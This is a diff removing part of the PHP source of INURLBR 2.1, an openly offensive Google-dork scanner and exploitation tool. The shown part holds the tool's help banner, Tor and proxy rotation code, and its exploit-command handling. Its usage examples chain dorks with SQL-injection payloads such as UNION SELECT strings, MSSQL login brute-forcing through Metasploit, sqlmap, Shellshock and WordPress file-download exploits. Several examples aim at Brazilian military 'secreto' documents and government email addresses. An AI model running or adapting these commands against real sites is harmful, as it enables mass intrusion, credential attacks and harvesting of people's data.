- Example: {$_SESSION["c1"]}hex({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}hex({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--exploit-get 'user?id=hex({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}hex{$_SESSION["c0"]} Generate random values.
- Example: {$_SESSION["c1"]}random({$_SESSION["c2"]}{character_counter}{$_SESSION["c1"]}){$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}random({$_SESSION["c2"]}8{$_SESSION["c1"]}){$_SESSION["c0"]}
- Usage: {$_SESSION["c1"]}--exploit-get 'user?id=random({$_SESSION["c2"]}8{$_SESSION["c1"]})'{$_SESSION["c0"]}
-
-");
-}
-
-function __info() {
-
- return system("command clear") . __getOut("
- {$_SESSION["c1"]}_____ _ _ ______ ____
-|_ _| \ | | ____/ __ \
- | | | \| | |__ | | | |
- | | | . ` | __|| | | |
- _| |_| |\ | | | |__| |
-|_____|_| \_|_| \____/
-
-{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current PHP version=>{$_SESSION["c1"]}[ " . phpversion() . "{$_SESSION["c0"]} ]
-{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current script owner=>{$_SESSION["c1"]}[ " . get_current_user() . "{$_SESSION["c0"]} ]
-{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current uname=>{$_SESSION["c1"]}[ " . php_uname() . "{$_SESSION["c0"]} ]
-{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current pwd=>{$_SESSION["c1"]}[ " . getcwd() . "{$_SESSION["c0"]} ]
-{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}GRUPO INURL BRASIL - PESQUISA AVANÇADA.
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}SCRIPT NAME: INURLBR 2.1
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}AUTOR: Cleiton Pinheiro
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Nick: Googleinurl
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Email: inurlbr@gmail.com
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Blog: http://blog.inurl.com.br
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Twitter: https://twitter.com/googleinurl
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Facebook: https://fb.com/InurlBrasil
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}GIT: https://github.com/googleinurl
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Pastebin https://pastebin.com/u/Googleinurl
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}PSS: https://packetstormsecurity.com/user/googleinurl
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}YOUTUBE: http://youtube.com/c/INURLBrasil
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}PLUS: http://google.com/+INURLBrasil
- {$_SESSION["c1"]}[*]{$_SESSION["c0"]}Version: 2.1
-
-{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}[+]{$_SESSION["c16"]}NECESSARY FOR THE PROPER FUNCTIONING OF THE SCRIPT{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}[ - ]{$_SESSION["c16"]} LIB & CONFIG{$_SESSION["c0"]}
-
- * PHP Version 5.4.7
- * php5-curl LIB
- * php5-cli LIB
- * cURL support enabled
- * cURL Information 7.24.0
- * allow_url_fopen On
- * permission Reading & Writing
- * User root privilege, or is in the sudoers group
- * Operating system LINUX
- * Proxy random TOR
-
-{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}PERMISSION EXECUTION: chmod +x inurlbr.php{$_SESSION["c0"]}
- {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING LIB PHP-CURL: sudo apt-get install php5-curl{$_SESSION["c0"]}
- {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING LIB PHP-CLI: sudo apt-get install php5-cli{$_SESSION["c0"]}
- {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033[0m
- {$_SESSION["c1"]}[+]{$_SESSION["c0"]} {$_SESSION["c16"]}INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en{$_SESSION["c0"]}
-
-{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}[ - ]{$_SESSION["c16"]} COMMANDS SIMPLE SCRIPT{$_SESSION["c0"]}
-
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:php?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:aspx?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:aspx (id|new)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\"{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'index of wp-content/uploads' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6,2,4 {$_SESSION["c1"]}-t {$_SESSION["c2"]}2 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'Index of /wp-content/uploads'{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.mil.br intext:(confidencial) ext:pdf' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6 -t 2 --exploit-get {$_SESSION["c3"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'confidencial'{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.mil.br intext:(secreto) ext:pdf' {$_SESSION["c1"]}-s save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}2 {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}'?' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'secreto'{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:aspx (id|new)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,6 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\"{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'.new.php?new id' {$_SESSION["c1"]}-s {$_SESSION["c2"]}save.txt {$_SESSION["c1"]}-q 1,6,7,2,3 {$_SESSION["c1"]}-t {$_SESSION["c2"]}1 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}'+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' {$_SESSION["c1"]}-a {$_SESSION["c2"]}'::EXPLOIT-SUCESS::'{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'new.php?id=' {$_SESSION["c1"]}-s {$_SESSION["c2"]}teste.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}?´0x27 {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]}'{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:pt inurl:aspx (id|q)' {$_SESSION["c1"]}-s {$_SESSION["c2"]}bruteforce.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}?´0x27 {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'msfcli auxiliary/scanner/mssql/mssql_login RHOST={$_SESSION["c9"]}_TARGETIP_ {$_SESSION["c2"]}MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E'{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:br inurl:id & inurl:php' {$_SESSION["c1"]}-s {$_SESSION["c2"]}get.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\" {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'python ../sqlmap/sqlmap.py -u \"{$_SESSION["c14"]}_TARGETFULL_{$_SESSION["c2"]}\" --dbs'{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:index.php?id=' {$_SESSION["c1"]}-q 1,2,10 {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"'?´0x27'\" {$_SESSION["c1"]}-s {$_SESSION["c2"]}report.txt {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap -Pn -p 1-8080 --script http-enum --open {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]}'{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email' {$_SESSION["c1"]}-s {$_SESSION["c2"]}reg.txt -q 1 --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}emails.txt {$_SESSION["c1"]}-m{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}urls.txt {$_SESSION["c1"]}-u{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:gov.bo' {$_SESSION["c1"]}-s {$_SESSION["c2"]}govs.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.uk' {$_SESSION["c1"]}-s {$_SESSION["c2"]}uk.txt {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]} 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)' {$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksSqli.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}govs.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksSqli.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}sqli.txt {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]} 1,2,6 {$_SESSION["c1"]}--irc {$_SESSION["c2"]}'irc.rizon.net#inurlbrasil' {$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'inurl:\"cgi-bin/login.cgi\"' {$_SESSION["c1"]}-s {$_SESSION["c2"]}cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_' {$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]} {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?´'%270x27;\"{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}4{$_SESSION["c0"]} {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?pass=1234\" {$_SESSION["c1"]}-a {$_SESSION["c2"]}'hello! admin'{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--target {$_SESSION["c2"]}'http://target.com.br' {$_SESSION["c1"]}-o {$_SESSION["c2"]}cancat_file_urls_find_valid_cod-200.txt {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-t {$_SESSION["c2"]}5{$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--range {$_SESSION["c2"]}'200.20.10.1,200.20.10.255' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php roteador.php _TARGETIP_' {$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--range-rad {$_SESSION["c2"]}'1500' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php roteador.php _TARGETIP_' {$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork-rad {$_SESSION["c2"]}'20' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\" {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c0"]}
-
-./inurlbr.php {$_SESSION["c1"]}--dork-rad {$_SESSION["c2"]}'20' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}--exploit-get {$_SESSION["c2"]}\"?´'%270x27;\" {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c0"]} --pr
-
-./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorksCGI.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c0"]} --pr --shellshock
-
-./inurlbr.php {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorks_Wordpress_revslider.txt' {$_SESSION["c1"]}-s {$_SESSION["c2"]}output.txt {$_SESSION["c1"]}-q {$_SESSION["c2"]}1,2,6,4,5,9,7,8 {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}'xpls_Arbitrary_File_Download.txt' {$_SESSION["c0"]}
- {$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
-
- {$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}It it also useful to know the full path to the PHP binary on your computer. {$_SESSION["c0"]}
- {$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}There are several ways of finding out. For Ubuntu and Mac OS X the path is '/usr/bin/php'.{$_SESSION["c0"]}
-
- googleinurl@inurlbr:~$ which php
- /usr/bin/php
- googleinurl@inurlbr:~/cli$ whereis php
- php: /usr/bin/php /usr/share/php /usr/share/man/man1/php.1.gz
- googleinurl@inurlbr:~/cli$ type -a php
- php is /usr/bin/php
-
-{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
-
-
-");
-}
-
-################################################################################
-#BANNER HOME####################################################################
-
-function __bannerLogo() {
-
- $vis = ($_SESSION["os"] != 1) ? ("\033[1;3" . rand(1, 10) . "m") : NULL;
-
- return (!is_null($_SESSION['config']['no-banner']) ? NULL : system("command clear") . "
-{$vis} _____ {$_SESSION["c1"]} .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. {$_SESSION["c12"]}.1BR'''Yp, .8BR'''Cq.
-{$vis} (_____){$_SESSION["c1"]} 01 01N. C 01 C 01 .01. 01 {$_SESSION["c3"]} 01 Yb 01 .01.
-{$vis} (() ()){$_SESSION["c1"]} 01 C YCb C 01 C 01 ,C9 01 {$_SESSION["c12"]} 01 dP 01 ,C9
-{$vis} \ / {$_SESSION["c1"]} 01 C .CN. C 01 C 0101dC9 01 {$_SESSION["c3"]} 01'''bg. 0101dC9
-{$vis} \ / {$_SESSION["c1"]} 01 C .01.C 01 C 01 YC. 01 , {$_SESSION["c12"]} 01 .Y 01 YC.
-{$vis} /=\ {$_SESSION["c1"]} 01 C Y01 YC. ,C 01 .Cb. 01 ,C {$_SESSION["c3"]} 01 ,9 01 .Cb.
-{$vis} [___] {$_SESSION["c1"]} .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C {$_SESSION["c12"]}.J0101Cd9 .J01L. .J01./ {$_SESSION["c1"]}2.1\n
-{$_SESSION["c1"]}__[ ! ] Neither war between hackers, nor peace for the system.
-{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://blog.inurl.com.br
-{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://fb.com/InurlBrasil
-{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://twitter.com/@googleinurl{$_SESSION["c0"]}
-{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}http://github.com/googleinurl{$_SESSION["c0"]}
-{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current PHP version::[ {$_SESSION["c1"]}" . phpversion() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
-{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current script owner::[ {$_SESSION["c1"]}" . get_current_user() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
-{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current uname::[ {$_SESSION["c1"]}" . php_uname() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
-{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}Current pwd::[ {$_SESSION["c1"]}" . getcwd() . " {$_SESSION["c16"]}]{$_SESSION["c0"]}
-{$_SESSION["c1"]}__[ ! ] {$_SESSION["c2"]}Help: php inurlbr.php --help{$_SESSION["c0"]}
-{$_SESSION["c1"]}------------------------------------------------------------------------------------------------------------------------{$_SESSION["c0"]}
-");
-}
-
-################################################################################
-#CHANGE PROXY FUNCTION IN TIME##################################################
-################################################################################
-
-function __timeValueChangeProxy($sec = NULL) {
-
- return not_isnull_empty($sec) ? date('Y-m-d H:i:s', strtotime(date('Y-m-d H:i:s') . " + {$sec} second")) : NULL;
-}
-
-function __timeSecChangeProxy($list_proxy) {
-
- if ($_SESSION["config"]["time_change_proxy"] < date('Y-m-d H:i:s') && !is_null($list_proxy)) {
- $proxy = $list_proxy[rand(0, count($list_proxy) - 1)];
- echo ("[ INFO ][PROXY] CHANGE: {$proxy} - " . date('Y-m-d H:i:s') . "\n");
- $_SESSION["config"]["proxy"] = $proxy;
- $_SESSION["config"]["time_change_proxy"] = __timeValueChangeProxy($_SESSION["config"]["time-proxy"]);
- __plus();
- }
-}
-
-################################################################################
-#GET STATUS HTTP URL############################################################
-################################################################################
-
-function __getStatusURL($url) {
-
- if (!is_null($url) && !empty($url)) {
- return FALSE;
- }
- __plus();
- $status = array();
- $curl = curl_init($url);
- curl_setopt($curl, CURLOPT_URL, $url);
- $resultadoCurl = curl_exec($curl);
- if ($resultadoCurl) {
- preg_match_all('(HTTP.*)', $resultadoCurl, $status['http']) . __plus();
-
- return (!is_null($status['http']) && !empty($status['http'])) ? TRUE : FALSE;
- }
- unset($curl);
- return FALSE;
-}
-
-################################################################################
-#BEEP ##########################################################################
-################################################################################
-
-function __cli_beep() {
-
- echo ($_SESSION['config']['beep']) ? "\x07" : NULL;
-}
-
-################################################################################
-#SETUP TO RUN COMMANDS IN ID####################################################
-################################################################################
-
-function __configExploitsExec($id, $alvo) {
-
- $resultadoURL = __configExploitsList();
- $final = array();
- $id_ = ((strstr($id, ','))) ? explode(',', $id) : array($id); // MULTIPLAS ID'S EXPLOITS
-
- foreach ($resultadoURL as $key) {
- $__key = strstr($key, '::') ? explode("\n", $key) : NULL;
- $final = is_array($__key) ? array_merge($final, $__key) : $final;
- }
- foreach ($id_ as $value) {
- $final__ = isset($value) && !empty($value) ? explode('::', $final[$value]) : NULL;
- $barra = "{$_SESSION["c1"]}[ INFO ]|___{$_SESSION["c0"]}\n";
- $barra.= " {$_SESSION["c1"]}|";
- print !is_null($final__) ? "\n{$barra}[ EXPLOIT ]:: {$final__[0]} /[ ID ]:: {$value} /[ COMMAND ]:: " . $final__[1] : NULL;
- echo "\n ------------------------------------------------------------------------------------------------------------------";
- print !is_null($final__) ? __command($final__[1], $alvo) : NULL;
- __plus();
- }
-}
-
-################################################################################
-#LIST COMMANDS FILE exploits.conf###############################################
-################################################################################
-
-function __configExploitsList($op = NULL) {
-
- $resultadoURL = array_unique(array_filter(explode("\n", file_get_contents($_SESSION['config']['file_exploit_conf']))));
-
- if (!is_null($op)) {
- echo __bannerlogo();
- echo $_SESSION["c11"];
- echo "[*]__\n";
- echo " |MENU EXPLOITS:";
- echo "\n |ID TYPE_EXPLOIT::EXPLOIT_COMMAND";
- echo "\n |FILE CONFIG: {$_SESSION['config']['file_exploit_conf']}";
- echo "\n |USE COMMAND EX: --exploit-id '1,2,3,19'";
- echo "\n-----------------------------------------------------------------------------------------------------------------------\n";
- print_r($resultadoURL);
- __getOut("{$_SESSION['config']['line']}\n");
- } else {
- return is_array($resultadoURL) ? $resultadoURL : NULL;
- }
-}
-
-################################################################################
-#INSERT VALUES COMMANDS FILE exploits.conf######################################
-################################################################################
-
-function __configExploitsADD($valor = NULL) {
-
- if (!is_null($valor) && preg_match("(([a-zA-Z0-9-].*)(::.*)([a-zA-Z0-9-]))", $valor)) {
- echo __bannerlogo();
- echo $_SESSION["c11"];
- echo "[*]__\n";
- echo " |MENU EXPLOITS:";
- echo "\n |ID TYPE_EXPLOIT::EXPLOIT_COMMAND";
- echo "\n |STATUS: ADDED VALUE WITH SUCCESS!";
- echo "\n |VALUE: {$valor}";
- echo "\n-----------------------------------------------------------------------------------------------------------------------\n";
- __saveValue($_SESSION['config']['file_exploit_conf'], __crypt($valor), 2);
- print_r(__configExploitsList());
- __getOut("{$_SESSION['config']['line']}\n");
- } else {
-
- __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}INCORRECT FORMAT! / Format TYPE_EXPLOIT::EXPLOIT_COMMAND / ex: NMAP::nmap -sV _TARGET_\n");
- }
-}
-
-################################################################################
-#CHECK CMS######################################################################
-################################################################################
-
-function __SimpleCheckCMS($html) {
-
- $cms['XOOPS CMS IDENTIFIED'] = ' $valor) {
-
- __plus();
- if (strstr($html, $cms[$campo])) {
- return(" {$campo} ");
- }
- }
- return "0xUNIDENTIFIED";
-}
-
-################################################################################
-#REPLACE THE SECURITIES URL#####################################################
-################################################################################
-
-function __replace($exploit, $url) {
-
- $exploit_ = strstr($_SESSION['config']['replace'], '[INURL]') ?
- $exploit :
- __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
- $exploit = explode("[INURL]", $exploit_);
- $exploit[0] = (isset($exploit[0]) && !is_null($exploit[0])) ?
- $exploit[0] :
- __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
- $exploit[1] = (isset($exploit[0]) && !is_null($exploit[1])) ?
- $exploit[1] :
- __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}DEFINE THE CORRECT REPLACE COMMAND ex: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}\n");
- return str_replace($exploit[0], $exploit[1], $url);
-}
-
-################################################################################
-#REMOVE VALUE URL###############################################################
-################################################################################
-
-function __remove($value, $url) {
-
- return str_replace($value, NULL, $url);
-}
-
-################################################################################
-#VALID MENU OPTIONS#############################################################
-################################################################################
-
-function __validateOptions($opArray, $validar, $op = NULL) {
-
- if (empty($validar) || empty($opArray)) {
- return FALSE;
- }
-
- $array = explode(',', $opArray);
- if (is_null($op)) {
- $busca = explode(',', $validar);
- for ($i = 0; $i <= count($busca); $i++) {
- if (in_array($busca[$i], $array)) {
- return TRUE;
- }
- }
- } else {
- for ($i = 0; $i <= count($array); $i++) {
- if (strstr($validar, $array[$i])) {
- return TRUE;
- }
- }
- }
- return FALSE;
-}
-
-################################################################################
-#VALIDATE OPERATING SYSTEM AND COLOR SYSTEM#####################################
-################################################################################
-
-function __OS() {
-
- $sistema = strtoupper(PHP_OS);
- if (substr($sistema, 0, 3) == "WIN") {
- $i = 0;
- system("cls");
- $_SESSION["os"] = 1;
- while ($i <= 17) {
- $_SESSION["c{$i}"] = NULL;
- $i++;
- }
- } else {
- system("command clear");
- //DEFINING COLORS
- $_SESSION["c0"] = "\033[0m"; // END OF COLOR
- $_SESSION["c1"] = "\033[1;37m"; // WHITE
- $_SESSION["c2"] = "\033[1;33m"; // YELLOW
- $_SESSION["c3"] = "\033[1;31m"; // RED LIGHT
- $_SESSION["c4"] = "\033[32m"; // GREEN
- $_SESSION["c5"] = "\033[1;32m"; // GREEN LIGHT
- $_SESSION["c6"] = "\033[0;35m"; // PURPLE
- $_SESSION["c7"] = "\033[1;30m"; // DARK GREY
- $_SESSION["c8"] = "\033[0;34m"; // BLUE
- $_SESSION["c9"] = "\033[0;37m"; // LIGHT GREY
- $_SESSION["c10"] = "\033[0;33m"; // BROWN
- $_SESSION["c11"] = "\033[1;35m"; // LIGHT PURPLE
- $_SESSION["c12"] = "\033[0;31m"; // RED
- $_SESSION["c13"] = "\033[1;36m"; // LIGHT CYAN
- $_SESSION["c14"] = "\033[0;36m"; // CIANO
- $_SESSION["c15"] = "\033[1;34m"; // LIGHT BLUE
- $_SESSION["c16"] = "\033[02;31m"; // DARK RED
- }
-}
-
-################################################################################
-#SAVE URL VULNERABLE COMMAND ECHO >> FILE######################################
-################################################################################
-
-function __saveValue($arquivo, $valor, $op = NULL) {
-
- $path = !not_isnull_empty($_SESSION['config']['save-as']) ? $_SESSION['config']['out_put_paste'] : NULL;
- echo ($op == 1) ?
- "\n{$_SESSION["c1"]}|_[ + ]{$_SESSION["c7"]} VALUE SAVED IN THE FILE::{$_SESSION["c9"]} {$arquivo}{$_SESSION["c0"]}" : NULL;
- file_put_contents(($op == 2) ? $arquivo : $path . $arquivo, "{$valor}\n", FILE_APPEND);
-}
-
-################################################################################
-#CAPTURE ID KEY TO SEARCH LYCOS MAKE############################################
-################################################################################
-
-function __getIdSearchLycos($html) {
-
- $match = NULL;
- preg_match_all("(val.*)", $html, $match);
- return (str_replace(');', '', str_replace('val(', '', str_replace("'", '', $match[0][4]))));
-}
-
-################################################################################
-#RENEW IP NETWORK TOR###########################################################
-################################################################################
-
-function __renewTOR() {
-
- system("[ -z 'pidof tor' ] || pidof tor | xargs sudo kill -HUP;");
- $request__ = __request_info('http://dynupdate.no-ip.com/ip.php', $_SESSION["config"]["proxy"]);
- __plus();
- echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ IP NETWORK TOR RENEWED ]::: {$_SESSION["c1"]}[ {$request__['corpo'] } ]\n{$_SESSION["c0"]}";
- /* https://pt.wikipedia.org/wiki/Pidof
- * pidof é um utilitário Linux que encontra o ID de um programa em execução.
- * Note que o próprio nome é a junção dos termos pid, que significa identidade
